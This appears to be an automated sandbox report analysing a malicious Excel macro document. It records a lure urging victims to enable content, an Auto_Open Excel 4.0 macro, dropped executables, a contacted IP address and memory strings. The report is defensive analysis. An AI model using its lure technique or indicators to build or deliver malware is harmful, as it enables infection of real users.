Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://graph.windows.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.windows.local
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://management.azure.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://management.azure.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://repository.luxtrust.lu0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://tasks.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown

HTTPS traffic detected: 50.87.232.245:443 -> 192.168.2.3:49722 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp

Binary or memory string: GetRawInputData

Source: Yara match	File source: Process Memory Space: fdcbn.exe PID: 4872, type: MEMORY
Source: Yara match	File source: Process Memory Space: fdcbn.exe PID: 5384, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 13_ Once You have Enable Editing, please click "
Source: Screenshot number: 4	Screenshot OCR: Enable Content" 14 from the yellow bar above 15 16 17 18" WHY I CANNOT OPEN THIS DOCUMENT? 19
Source: Screenshot number: 8	Screenshot OCR: Enable Content O X A Share ::u':Sum " Zy JO Sort & Find & CL C ear FI ter Sc ect Editing ^ X

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: request_form_1611565093.xlsm

Initial sample: CALL

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\msdownld.tmp\AS01A87F.tmp\victory.php	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\otrgh\sdgvjk\fdcbn.exe	Jump to dropped file

Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C2AF0	1_2_00007FF7645C2AF0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C1780	1_2_00007FF7645C1780
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BB780	1_2_00007FF7645BB780
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BB980	1_2_00007FF7645BB980
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C0980	1_2_00007FF7645C0980
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645CA980	1_2_00007FF7645CA980
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645E3560	1_2_00007FF7645E3560
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645E4F70	1_2_00007FF7645E4F70
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645CBB70	1_2_00007FF7645CBB70
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B7350	1_2_00007FF7645B7350
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BA730	1_2_00007FF7645BA730
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C1330	1_2_00007FF7645C1330
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C2330	1_2_00007FF7645C2330
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C1C00	1_2_00007FF7645C1C00
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B9C00	1_2_00007FF7645B9C00
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B8800	1_2_00007FF7645B8800
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B1000	1_2_00007FF7645B1000
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645FE210	1_2_00007FF7645FE210
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BDFC2	1_2_00007FF7645BDFC2
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF764604B98	1_2_00007FF764604B98
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BA080	1_2_00007FF7645BA080
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645FF090	1_2_00007FF7645FF090
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B468D	1_2_00007FF7645B468D
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B9460	1_2_00007FF7645B9460
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B5E40	1_2_00007FF7645B5E40
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BB050	1_2_00007FF7645BB050
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645FDE50	1_2_00007FF7645FDE50
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B124B	1_2_00007FF7645B124B
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BAC30	1_2_00007FF7645BAC30
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C3710	1_2_00007FF7645C3710
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B2F10	1_2_00007FF7645B2F10
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645E92D0	1_2_00007FF7645E92D0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B32A0	1_2_00007FF7645B32A0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645CA0A0	1_2_00007FF7645CA0A0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B52B0	1_2_00007FF7645B52B0

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9303"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="3" r:id="rId3"/></sheets><functionGroups builtInGroupCount="17"/><definedNames><definedName name="dontdoit" function="1" xlm="1" functionGroupId="9">-676986879</definedName><definedName name="okwell" function="1" xlm="1" functionGroupId="9">124715010</definedName><definedName name="plzno" function="1" xlm="1" functionGroupId="9">-709623808</definedName><definedName name="_xlnm.Auto_Open">'Doc1'!$AA$6</definedName></definedNames><calcPr calcId="122211"/></workbook>

Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp

Binary or memory string: FPicturesVideosCommunicationsInternetUsersLibrariesUserFilesDocumentsCompressedFolder@shell32.dll,-34829@shell32.dll,-34830@shell32.dll,-34831@shell32.dll,-34832@shell32.dll,-34824@shell32.dll,-34825@shell32.dll,-34826@shell32.dll,-34827@shell32.dll,-34820@shell32.dll,-34821@shell32.dll,-34822@shell32.dll,-34823OpenSearch@shell32.dll,-34817@shell32.dll,-34818@shell32.dll,-34819@shell32.dll,-34828@shell32.dll,-34837@shell32.dll,-34838@shell32.dll,-34836@shell32.dll,-34839@shell32.dll,-34840@shell32.dll,-34835AppJscriptJavascriptResLDAPFileExplorer.ZipSelectionIerssIehistoryExplorer.BurnSelectionExplorer.AssocProtocol.search-msExplorer.EraseDiscExplorer.CloseSessionExplorer.AssocActionId.CloseSessionExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.ZipSelectionExplorer.AssocActionId.EraseDisc.appref-ms.application.bas.asp.adeWMP11.AssocProtocol.MMS.app.adpwindowsmediacenterappVbscriptwindowsmediacenterwebwindowsmediacentersslStickyNotesrlogintn3270telnet.hta.hpj.isp.ins.grp.gadget.hme.hlp.crt.crds.fxp.csh.cpf.cnt.crd.cpl.maw.mav.mda.mcf.mas.mar.mau.mat.mag.maf.maq.mam.jse.its.mad.ksh.pcd.ops.plg.pl.msh2xml.msh2.mst.mshxml.msh.msc.msh1xml.msh1.mdt.mde.mdz.mdw.rbw.rb.rgu.rdp.pyo.pyc.plsc.pvw.ps2xml.ps2.py.psc2.prg.prf.provxml.printerexport.wsc.ws.xaml.wsh.vsmacros.vbp.webpnp.vsw.tsk.theme.vbe.vb.scr.scf.shs.shb.xip.xdp.xnk`

Source: classification engine

Classification label: mal80.expl.evad.winXLSM@5/15@1/4

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\otrgh\sdgvjk\fdcbn.exe

Mutant created: \Sessions\1\BaseNamedObjects\DOBLRPWBUQFD

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{A6CD0287-F39E-46CD-979D-EA2876FB904D} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\otrgh\sdgvjk\fdcbn.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'
Source: unknown	Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'	Jump to behavior
Source: C:\otrgh\sdgvjk\fdcbn.exe	Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: kernel32.pdbUGP source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
Source:	Binary string: dnsapi.pdbUGP source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
Source:	Binary string: wininet.pdb source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
Source:	Binary string: ws2_32.pdb source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7`d source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp, 9ght3erd[1].exe.0.dr
